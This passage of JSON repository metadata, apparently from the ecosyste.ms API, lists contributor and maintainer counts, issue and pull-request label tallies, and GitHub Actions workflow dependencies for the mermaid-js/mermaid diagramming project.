yuno-Ki":2,"DannyBen":2,"SpecularAura":2,"sorenisanerd":2,"mastersibin":2,"tinnguyen0298":2,"rhysd":2,"RunLittleTurtle":2,"politbuero-kampagnen":2,"Encr1pt0r":2,"regisbsb":2,"SeriousSamV":2,"anlai46":2,"IceFreez3r":2,"shikaan":2,"vitorsss":2,"yoshinorin":2,"conradagramont":2,"elgalu":2,"chrisirhc":2,"thepassle":2,"SimonMarquis":2,"zackkatz":2,"moamen96egy":2,"macherel":2,"generrosity":2,"husainsaifuddin":2,"arpitjain099":2,"FezVrasta":2,"homersimpsons":2,"AlexMooney":2,"schadenn":2,"N3-23":2,"123-456-ux":2,"Timac":2,"robo1200":2,"ReneLombard":2,"TomasHubelbauer":2,"PraneethPunugoti":2,"siddharthisrani":2,"paldeep-singh":2,"kevinwuhoo":2,"emmby":2,"markqian":2,"adjerbetian":2,"nalgeon":2,"universeroc":2,"bonyuta0204":2,"shps951023":2,"tijesunimi-peters":2,"JenningsWilliam":2,"docxml":2,"vorburger":2,"cmnstmntmn":2,"KermanX":2,"dudeofawesome":2,"emersonbottero":2,"royaljain":2,"sametcn99":2,"GauBen":2,"bstordrup":2,"yihui":2,"ScriptBloom":2,"guypursey":2,"agokhale":2,"wizbit":2,"pbrolin47":1,"devuser200":1,"zhifeiyue":1,"omahs":1,"kamalkishor1991":1,"sshah135":1,"chadfawcett":1,"REVERB283":1,"dennis0324":1,"hustcc":1,"lcnittl":1,"matt-baker-agd-systems":1,"leopragi":1,"chaursiyasanjeet":1,"LEMI92":1,"masterujjval":1,"jasmaa":1,"Prashant-7718":1,"liyifa-efan":1,"amsubhash":1,"claesgill":1,"MikeJeffers":1,"koppor":1,"skogsbaer":1,"jakebeamish":1,"djadmin":1,"Ogglas":1,"maiermic":1,"AlanOchoaMtz":1,"ntsd":1,"HashanCP":1,"Alexiafer":1,"janjonas":1,"vertxxyz":1,"nashtechlabs":1,"Vikrantpalle":1,"GingerNinjaNicko":1,"jonnymuir":1,"GDFaber":1,"brvv":1,"mzner":1,"nhtnhan":1,"Mister-Hope":1,"Bunker-D":1,"serhhatsari":1,"JoaoFalanga":1,"zeelsheladiya":1,"RounakJoshi09":1,"gschlager":1,"good-jinu":1,"setsuna-fb":1,"SahilNagpure07":1,"wolfoo2931":1,"welfuture":1,"hersberger":1,"soomrozaid":1,"ijunxyz123":1,"dsblank":1,"mribeirodantas":1,"Patronud":1,"itz-salemm":1,"amanmunjekar":1,"bolshoytoster":1,"ellenealds":1,"StefonSimmons":1,"tobie":1,"jason-curtis":1,"hutcheb":1,"aniston":1,"RohanHandore":1,"soumyachalluru":1,"iwestlin":1,"csholmq":1,"Olshansk":1,"tcbuzor":1,"Muhammad-Tayyab-Bhutto":1,"andriy-koz":1,"i-am-the-slime":1,"DanielLipowicz":1,"haxck":1,"zarhasan":1,"harishkumarc":1,"raiman264":1,"0xflotus":1,"72636c":1,"ksilverwall":1,"ykatchou":1,"diegosogari":1,"mutricyl":1,"letohx":1,"FirstTimeInForever":1,"anderium":1,"lchenay":1,"eitsupi":1,"nghtlinh":1,"sadikkuzu":1,"rflban":1,"shaikshahid98":1,"jonashaag":1,"begleynk":1,"duyaan":1,"ajdamico":1,"rsdewi1982":1,"shanti2530":1,"jakeboone02":1,"GRASBOCK":1,"SusheelThapa":1,"bitflorist":1,"Talaldesign":1,"duvis39":1,"danielcompton":1,"RSS1102":1,"Caranell":1,"karthxk07":1,"Valentine14th":1,"Tahseen23":1,"salemregresa-spec":1,"agentraghav":1,"ferozmht":1,"teyc":1,"toolness":1,"gjtorikian":1,"sblom":1,"twpol":1},"host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2025-09-05T00:00:10.444Z","repositories_count":10101874,"issues_count":31502423,"pull_requests_count":97598050,"authors_count":10703170,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"},"past_year_issue_labels_count":{"Status: Triage":365,"Type: Bug / Error":285,"Type: Enhancement":91,"Type: New Diagram":28,"Status: Approved":17,"Good first issue!":12,"Graph: Flow":5,"Sponsored by MermaidChart":2,"Graph: Block":2,"P1":2,"Status: Resolved":1,"Internals: Parser":1,"Status: In progress":1,"Graph: Gantt":1,"chore":1,"Status: Pending":1,"fix":1,"Graph: Sequence":1,"Graph: Mindmap":1,"Graph: Entity Relationship":1,"Contributor needed":1},"past_year_pull_request_labels_count":{"Type: Bug / Error":71,"Sponsored by MermaidChart":53,"Type: Enhancement":44,"Area: Documentation":38,"Type: Other":34,"spam":6,"Area: DevOps":5,"Graph: Timeline":4,"Graph: Flow":4,"Graph: Sequence":2,"Graph: Block":2,"fix":2,"Graph: Git":2,"Graph: Gantt":2,"codex":2,"Graph: State":2,"Graph: Class":2,"Graph: Entity Relationship":2,"Graph: Architecture":2,"Graph: Pie":1,"feature":1},"past_year_issue_author_associations_count":{"NONE":372,"CONTRIBUTOR":43,"COLLABORATOR":17,"MEMBER":5},"past_year_pull_request_author_associations_count":{"CONTRIBUTOR":346,"NONE":237,"COLLABORATOR":118,"MEMBER":105},"past_year_issue_authors":{"knsv":14,"shubham-mermaid":11,"nourhenta":8,"HariSekhon":7,"nour0205":6,"jsoref":5,"hakanson":4,"bollwyvl":3,"BambioGaming":3,"alex-papaioannou":3,"generrosity":3,"shubhamparikh2704":3,"NourBenz":3,"awhitford":2,"Badboyboom":2,"tribbloid":2,"Tylersuard":2,"ozyx":2,"TomasHubelbauer":2,"jk2K":2,"Timac":2,"nicolas-goyon":2,"Hi-Angel":2,"one2ndpiece":2,"null1235":2,"slorber":2,"oasis1500":2,"megantriplett":2,"PHHENS":2,"Vitir266":2,"fazleyazdan":2,"kairi003":2,"raja3315a":2,"pinage404":2,"SailorMax":2,"SaanchitaV":2,"kimulaco":2,"quilicicf":1,"R1ckyH":1,"onford":1,"R3B04N":1,"raschCZ":1,"Ray26123":1,"reakaleek":1,"Rednas83":1,"omkarht":1,"olli4":1,"Oliad-R":1,"QriDoki":1,"OrionSehn":1,"qinbinhua601":1,"PradeepDurairaj-int":1,"PLukas2018":1,"ouvreboite":1,"pimpinwannabe":1,"PhilippSchwaab":1,"paul-sachs":1,"pberndt":1,"pbreheny":1,"PetrLaskevic":1,"Phebonacci":1,"okoeroo":1,"MoeJD":1,"mmcdermott":1,"Minghao2812":1,"MikeSQ":1,"mikesamuel":1,"mieulium":1,"MichelLaplane":1,"mgrubb":1,"mfulton26":1,"meeuwtjes":1,"mclayton7":1,"mayank1513":1,"mattmccormick":1,"matevz":1,"mateu-at-itb":1,"markus-96":1,"markeenrw":1,"mankoff":1,"manasbeck97765-art":1,"Oipo":1,"odros":1,"NVolcz":1,"npapnet":1,"noamross":1,"nicolas-guilhot":1,"NichUK":1,"Nhienlv99":1,"nekoya":1,"nanoant":1,"NagayamaToshiaki":1,"nacho4d":1,"MyPrototypeWhat":1,"mvonweis":1,"mukesh-cesit":1,"mtrakal":1,"MrAntix":1,"mootari":1,"mohankannan6785":1,"Vturnus":1,"vorburger":1,"viktorprogger":1,"vicaya":1,"veritime-nft":1,"vdusek":1,"Vanuan":1,"uniqueqidian":1,"twdtech":1,"tuyen-at-work":1,"tommoor":1,"tomdaly":1,"t-ir":1,"Tinger-X":1,"threonorm":1,"threepistons":1,"thienphuoc86":1,"thelinguist":1,"thefasquelle":1,"ThakareIshan":1,"thaheemDev":1,"zjy-dev":1,"ziidonato":1,"zhuwenyun":1,"zhangping":1,"ZcuBa":1,"Yue-Meng-Zhao":1,"youngcitrus":1,"yooneskh":1,"yari-dewalt":1,"Xorok":1,"xkernal":1,"xinnj":1,"xh-w":1,"Xavier776":1,"Wong1dev":1,"wizbit":1,"wikilpmk":1,"whitelizard":1,"weoam":1,"wasphin":1,"walex999":1,"sharma9012mahesh":1,"Shahir-47":1,"sewolf":1,"setsuna-fb":1,"seemaPatel16":1,"schicks":1,"sby-a-izumi":1,"saurabhg772244":1,"RSS1102":1,"rpalsa1":1,"Rogeriohsjr":1,"rodcloutier":1,"robross0606":1,"robert35":1,"RiyanshiTomar":1,"Rico9001":1,"RichardoC":1,"RichardJECooke":1,"ReneLombard":1,"remcohaszing":1,"rehevkor5":1,"TeUm3048":1,"terra40rm":1,"teppeson":1,"TendTo":1,"ta-mv":1,"tamdaz":1,"swinadeor":1,"suelambot":1,"stefan-girlich":1,"stechio":1,"sstchur":1,"soichisumi":1,"sjn":1,"sirnails":1,"sidharthv96":1,"shouziws":1,"shokai":1,"Shion1305":1,"shiniizk":1,"shikaan":1,"sheeeng":1,"maikol-solis":1,"cotemok":1,"copilot-a-sys":1,"Connor-Bernard":1,"colindean":1,"Coderambling":1,"codenet":1,"Clopos-Rovshan-Badirkhanov":1,"ClarkZaitun":1,"ciuliene":1,"chu121su12":1,"chrisirhc":1,"chriscconte":1,"ChenxiangWang":1,"chardskarth":1,"cduguet":1,"cdaringe":1,"Carus11":1,"Callum-Halton":1,"CAFxX":1,"cafenroy":1,"bryandamon":1,"Downchuck":1,"DonaverBoxwood":1,"dmenisdev":1,"dkaszews":1,"djibe":1,"digitalmoksha":1,"diceroll123":1,"devinhedge":1,"DetachHead":1,"denkpass":1,"Deliaz":1,"delanym":1,"debajyotisaikia1":1,"dayspring2chen":1,"darin-lead":1,"dandaviesbrackett":1,"daixtrose":1,"D0kRay":1,"criyle":1,"Crell":1,"cpelley":1,"AndreiShenets":1,"anadal-fundaciobit":1,"amna-pullflow":1,"AMBudnik":1,"amatiasq":1,"amacsmith":1,"aloisklink":1,"almathie":1,"AlGuil":1,"Alanterrer":1,"ajuckel":1,"ahtshammustafa":1,"adamfk":1,"Adam-Antios":1,"aCoo4ie":1,"accarvajal":1,"abhishek-hopstack":1,"aaqib-ahmed-nazir":1,"72636c":1,"5FeetUnder":1,"0xshellming":1,"BryanCrotazGivEnergy":1,"BrunoGiacomazzi":1,"briz123":1,"brean":1,"boboboneX":1,"Baraka24":1,"banketvv":1,"aztack":1,"aubertc":1,"atuttle":1,"atollk":1,"ashishjain0512":1,"arsium":1,"arpitjain099":1,"aress31":1,"arden13":1,"ArchiDog1998":1,"ArashPartow":1,"Anthony-Gaudino":1,"Annopick":1,"AndreKurait":1,"jpVm5jYYRE1VIKL":1,"josecastillolema":1,"jonmattgray":1,"johnnydecimal":1,"johnmdesjardins":1,"JoblersTune":1,"jkirk-denaliai":1,"jkillingsworth":1,"jjregis":1,"jgreywolf":1,"jenschude":1,"jens2017kam":1,"jboog1123":1,"JBBianchi":1,"jayaprabhakar":1,"jagadeesh-r1":1,"Ikki-Dai":1,"ijunxyz123":1,"ijmitch":1,"IHMEkaleb":1,"idmake-github":1,"Maia313":1,"LucasHaug":1,"luca-script":1,"lrecknagel":1,"loozhengyuan":1,"lnihlen":1,"liu-huitao":1,"Limbend":1,"lijh8":1,"lesteral":1,"kovasap":1,"kool79":1,"Koepisch":1,"kiranbhadani":1,"khs26":1,"kevin-james-sp":1,"keenanwells-tatari":1,"karagenit":1,"kabaluyot":1,"k12ish":1,"justinmchase":1,"gherman-cs":1,"gerteck":1,"furqanms":1,"fugohan":1,"FuadEfendi":1,"Frank-Uwe":1,"flyisland":1,"FlorentP42":1,"fgmarand":1,"fengliner":1,"FeddyLix17":1,"estranged42":1,"ErMagnificoo":1,"ericjameszimmerman":1,"emersonbottero":1,"electroluxcode":1,"dwSun":1,"dwhieb":1,"DrorHarari":1,"drdozer":1,"dragrubis":1,"ideless":1,"huihui925":1,"Hugofbf21":1,"HonamLi":1,"hogo7":1,"hkws":1,"hjfreyer":1,"hjamaleddine":1,"Hentioe":1,"henri9813":1,"HashanCP":1,"haoqin8620":1,"handsomefox":1,"h0lg":1,"guilhem":1,"Guido-Vi":1,"Grunthos":1,"Grovkillen":1,"GreedyPirate":1,"GoulartNogueira":1,"gjain7":1},"past_year_pull_request_authors":{"renovate[bot]":119,"sidharthv96":53,"github-actions[bot]":48,"huynhicode":28,"saurabhg772244":28,"darshanr0107":26,"nour0205":25,"knsv":24,"shubham-mermaid":23,"ashishjain0512":20,"yari-dewalt":18,"aloisklink":16,"omkarht":16,"rajat-ht":11,"nourhenta":10,"BambioGaming":10,"Shahir-47":10,"jeswr":8,"jsoref":8,"thomascizeron":7,"CoyAce":6,"NicolasNewman":6,"kairi003":5,"ajuckel":5,"ban-abhijit":5,"Mandzhi":4,"yogitas-ht":4,"FelixMarcus":4,"kriss-u":4,"shubhamparikh2704":4,"megantriplett":4,"bollwyvl":4,"Robbbo-T":4,"IOrlandoni":4,"quilicicf":3,"NourBenz":3,"Baraka24":3,"monicanguyen25":3,"evan-moon":3,"enourbakhsh":3,"MrCoder":3,"stereobooster":2,"RunLittleTurtle":2,"yihui":2,"mRcOol7":2,"claudia584498":2,"remcohaszing":2,"shps951023":2,"politbuero-kampagnen":2,"guzzit":2,"jgreywolf":2,"qraqras":2,"NealGooch":2,"michaelbaudino":2,"MikeSQ":2,"universeroc":2,"docxml":2,"jrobichaud":2,"daanklijn":2,"regisbsb":2,"SeriousSamV":2,"Ryuno-Ki":2,"Miguelborrego2000":2,"AaronMoat":2,"alexchen1337":2,"SpecularAura":2,"bibehbibe":2,"emersonbottero":2,"tinnguyen0298":2,"gancena":2,"gaurav-chaurasia":2,"Syn3ugar":2,"neuromechanist":2,"Maia313":2,"jahredhope":2,"lgazo":2,"BryanCrotazGivEnergy":2,"royaljain":2,"schicks":2,"mnito":2,"Actpohomoc":2,"MoonBall":2,"ReneLombard":2,"gbremond":2,"dhananjaydeshmukhperforce":2,"tommoor":2,"zackkatz":2,"SimonMarquis":2,"chrisirhc":2,"igorwessel":2,"80avin":2,"123-456-ux":2,"N3-23":2,"iSparsh":2,"rohanod":2,"yoshinorin":2,"samuei":2,"kedar49":2,"lrecknagel":2,"homersimpsons":2,"binary8421":2,"arpitjain099":2,"mgrubb":2,"shikaan":2,"husainsaifuddin":2,"generrosity":2,"ryanwjackson":2,"jayaprabhakar":2,"IceFreez3r":2,"gemmaro":2,"afmireski":2,"P1394":2,"kimulaco":2,"theHacker":2,"tijesunimi-peters":2,"amine-a11":2,"wizbit":2,"drkhalidmd":2,"agokhale":2,"vorburger":2,"PraneethPunugoti":2,"kevinwuhoo":2,"sametcn99":2,"gabeidx":2,"internetisaiah":2,"TomasHubelbauer":2,"okineadev":2,"space-77":2,"suelambot":2,"GauBen":2,"duyaan":1,"Alexiafer":1,"HashanCP":1,"jakebeamish":1,"liyifa-efan":1,"salemregresa-spec":1,"aniston":1,"eitsupi":1,"soumyachalluru":1,"ferozmht":1,"pbrolin47":1,"Tahseen23":1,"RSS1102":1,"Caranell":1,"72636c":1,"rsdewi1982":1,"setsuna-fb":1,"matt-baker-agd-systems":1,"lcnittl":1,"mmorel-35":1,"hutcheb":1,"ijunxyz123":1,"leopragi":1,"Prashant-7718":1,"zarhasan":1,"DanielLipowicz":1,"shanti2530":1,"hustcc":1,"teyc":1,"bitflorist":1,"exoego":1,"mzner":1,"mutricyl":1,"nghtlinh":1,"anderium":1,"good-jinu":1},"maintainers":[{"login":"sidharthv96","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":84,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"saurabhg772244","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"ashishjain0512","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"NicolasNewman","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"shubham-mermaid","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"}],"active_maintainers":[{"login":"sidharthv96","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"huynhicode","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"saurabhg772244","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"shubham-mermaid","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"}]},"events":null,"keywords":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/build-docs.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:31.984Z","updated_at":"2023-09-29T07:57:31.984Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/build-docs.yml","dependencies":[{"id":14013831247,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013831250,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013831253,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/build.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.089Z","updated_at":"2023-09-29T07:57:32.089Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/build.yml","dependencies":[{"id":14013831696,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013831697,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013831698,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013831699,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/check-readme-in-sync.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.135Z","updated_at":"2023-09-29T07:57:32.135Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/check-readme-in-sync.yml","dependencies":[{"id":14013831901,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/checks.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.461Z","updated_at":"2023-09-29T07:57:32.461Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/checks.yml","dependencies":[{"id":14013832002,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832003,"package_name":"testomatio/check-tests","ecosystem":"actions","requirements":"stable","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/codeql.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.914Z","updated_at":"2023-09-29T07:57:32.914Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/codeql.yml","dependencies":[{"id":14013832036,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832037,"package_name":"github/codeql-action/init","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013832038,"package_name":"github/codeql-action/autobuild","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013832039,"package_name":"github/codeql-action/analyze","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/dependency-review.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.926Z","updated_at":"2023-09-29T07:57:32.926Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/dependency-review.yml","dependencies":[{"id":14013832043,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832045,"package_name":"actions/dependency-review-action","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/e2e-applitools.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.935Z","updated_at":"2023-09-29T07:57:32.935Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/e2e-applitools.yml","dependencies":[{"id":14013832149,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832151,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013832153,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832155,"package_name":"cypress-io/github-action","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/e2e.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.944Z","updated_at":"2023-09-29T07:57:32.944Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/e2e.yml","dependencies":[{"id":14013832246,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832248,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013832249,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832251,"package_name":"cypress-io/github-action","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":14013832253,"package_name":"codecov/codecov-action","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832255,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/issue-triage.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.950Z","updated_at":"2023-09-29T07:57:32.950Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/issue-triage.yml","dependencies":[{"id":14013832331,"package_name":"andymckay/labeler","ecosystem":"actions","requirements":"1.0.4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/link-checker.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.956Z","updated_at":"2023-09-29T07:57:32.956Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/link-checker.yml","dependencies":[{"id":14013832432,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832435,"package_name":"actions/cache","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832438,"package_name":"lycheeverse/lychee-action","ecosystem":"actions","requirements":"v1.8.0","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/lint.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.962Z","updated_at":"2023-09-29T07:57:32.962Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/lint.yml","dependencies":[{"id":14013832548,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832549,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013832550,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832551,"package_name":"EndBug/add-and-commit","ecosystem":"actions","requirements":"v9","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/pr-labeler-config-validator.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:32.969Z","updated_at":"2023-09-29T07:57:32.969Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/pr-labeler-config-validator.yml","dependencies":[{"id":14013832552,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013832553,"package_name":"Yash-Singh1/pr-labeler-config-validator","ecosystem":"actions","requirements":"releases/v0.0.3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/pr-labeler.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:34.476Z","updated_at":"2023-09-29T07:57:34.476Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/pr-labeler.yml","dependencies":[{"id":14013834243,"package_name":"TimonVS/pr-labeler-action","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/publish-docs.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:34.484Z","updated_at":"2023-09-29T07:57:34.484Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/publish-docs.yml","dependencies":[{"id":14013834250,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013834251,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013834252,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013834253,"package_name":"actions/configure-pages","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013834254,"package_name":"actions/upload-pages-artifact","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":14013834255,"package_name":"actions/deploy-pages","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release-draft.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:34.497Z","updated_at":"2023-09-29T07:57:34.497Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/release-draft.yml","dependencies":[{"id":14013834256,"package_name":"toolmantim/release-drafter","ecosystem":"actions","requirements":"v5","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release-preview-publish.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:36.676Z","updated_at":"2023-09-29T07:57:36.676Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/release-preview-publish.yml","dependencies":[